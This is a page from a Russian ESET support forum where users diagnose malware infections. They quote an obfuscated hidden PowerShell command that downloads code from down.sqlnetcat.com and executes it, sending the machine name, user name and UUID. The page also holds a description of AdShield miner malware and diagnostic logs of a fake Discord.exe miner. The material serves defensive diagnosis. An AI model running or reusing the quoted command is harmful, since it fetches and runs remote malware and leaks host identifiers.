Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.
Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.
Купить и продлить лицензии ESET на нашем сайте больше нельзя.
Предлагаем вам попробовать новые продукты компании PRO32.
PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.
| Цитата |
|---|
| Владимир Шариков написал: Что этот код делает? Стоит ли боятся "Последствий" этой бяки? |
| Цитата |
|---|
| C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*')))) |
| Цитата |
|---|
| Danil Perepelyak написал: И после обновления антивируса папка 23862 на этом расположении была. |
| Цитата |
|---|
| Зловред распространяется под именем adshield[.]pro и выдает себя за Windows-версию мобильного блокировщика рекламы AdShield. После того как пользователь запускает программу, она меняет настройки DNS на устройстве так, что все домены начинают разрешаться через серверы злоумышленников, которые, в свою очередь, не дают пользователям получить доступ к сайтам некоторых антивирусов, например к Malwarebytes.com. |
| Цитата |
|---|
| После подмены DNS-серверов зловред начинает обновляться и запускает updater.exe с аргументом self-upgrade («C:\Program Files (x86)\AdShield\updater.exe» -self-upgrade). Updater.exe обращается к командному центру и отправляет сведения о зараженной машине и информацию о начале установки. |
| Цитата |
|---|
| Updater.exe скачивает с сайта transmissionbt[.]org и запускает модифицированный торрент-клиент Transmission (оригинальный дистрибутив находится по адресу transmissionbt.com). Модифицированная программа отсылает на командный сервер информацию об установке вместе с идентификатором зараженной машины и загружает с него модуль для майнинга. |
| Цитата |
|---|
| .... \Flock\config.json \Flock\data.pak \Flock\Flock.exe \Flock\lic.data \Flock\Qt5Core.dll \Flock\WinRing0x64.sys ... |
| Цитата |
|---|
| Полное имя C:\WINDOWS\SYSTEM32\FIND.EXE Удовлетворяет критериям THREADS IN PROCESSES (ПРЕДУПРЕЖДЕНИЕ ~ ОБНАРУЖЕН ВНЕДРЕННЫЙ ПОТОК В ПРОЦЕССЕ)(1) [auto (0)] FLOCK (FILTERED) (ПОЛНОЕ ИМЯ ~ \WINDOWS\SYSTEM32\FIND.EXE)(1) [filtered (0)] FLOCK (FILTERED).NET ( ESTABLISHED ~ > 54.93.84.207:443)(1) [filtered (0)] pid = 3076 ***\*** CmdLine "C:\ProgramData\Flock\find.exe" Процесс создан 00:39:49 [2021.02.18] С момента создания 00:05:25 CPU 49,85% CPU (1 core) 797,57% parentid = 13628 ESTABLISHED 192.168.0.98:55478 <-> 54.93.84.207:443 Предупреждение (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3076], tid=14380 Предупреждение (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3076], tid=9436 SHA1 1E44EE63BDB2CF3A6E48B521844204218A001344 MD5 AE3F3DC3ED900F2A582BAD86A764508C Загруженные DLL НЕИЗВЕСТНЫЕ BXSDK64.DLL C:\USERS\SHUM\APPDATA\LOCAL\TEMP Загруженные DLL ИЗВЕСТНЫЕ и ПРОВЕРЕННЫЕ ADVAPI32.DLL C:\WINDOWS\SYSTEM32 |
| Цитата |
|---|
| EV_RenderedValue_0,00 Elvi51 ELVI51 277248 7264 C:\Windows\System32\find.exe %%1937 16620 "C:\WINDOWS\system32\find.exe" EV_RenderedValue_9,00 - - 0 C:\ProgramData\Discord\Discord.exe EV_RenderedValue_14,00 |
| Цитата |
|---|
| EV_RenderedValue_0,00 ELVI51$ WORKGROUP 999 16620 C:\ProgramData\Discord\Discord.exe %%1937 1400 C:\ProgramData\Discord\Discord.exe --min EV_RenderedValue_9,00 Elvi51 ELVI51 277248 C:\Windows\System32\svchost.exe EV_RenderedValue_14,00 |
| Цитата |
|---|
| Полное имя C:\PROGRAMDATA\DISCORD\DISCORD.EXE Сигнатура Trojan.Win64.Miner.gen [Kaspersky] (delall) [глубина совпадения 33(58), необх. минимум 30, максимум 64] 2021-02-28 SHA1 397F3E0FD803DA50EC667C1161E57CDC242400C3 MD5 07D8343249A56EEBF2B1A8B944C217A3 Ссылки на объект Ссылка C:\WINDOWS\TASKS\DISCORDCHECK_4.JOB Значение "C:\ProgramData\Discord\Discord.exe" --min |
| Цитата |
|---|
| 4.11.5 o Добавлена поддержка отслеживания процессов. Отслеживание процессов позволяет определять родителя любого процесса, даже если родительский процесс уже завершен, а также достоверно определять все файлы, которые запускались с момента старта системы. |
| Цитата |
|---|
| 4.11.6 o Добавлена поддержка отслеживания задач. В окно информации исполняемого файла, который создавал, модифицировал или изменял задачи добавлены следующие разделы: "Создание задачи", "Удаление задачи", "Обновление задачи" в которых указано время операции, pid процесса, pid и имя запустившего процесс, а так же XML описание задачи при его наличии. Твики #39/#40 теперь включают/отключают отслеживание процессов и задач. (!) Только для Windows 10 билд 1903 и выше. |
| Цитата |
|---|
| anton dushko написал: сейчас сделал для теста зеркало в папке где доступ всем и рабочая группа - ошибка так же вылазит |
| Цитата | ||
|---|---|---|
anton dushko написал:
|
| Цитата | ||
|---|---|---|
anton dushko написал:
|
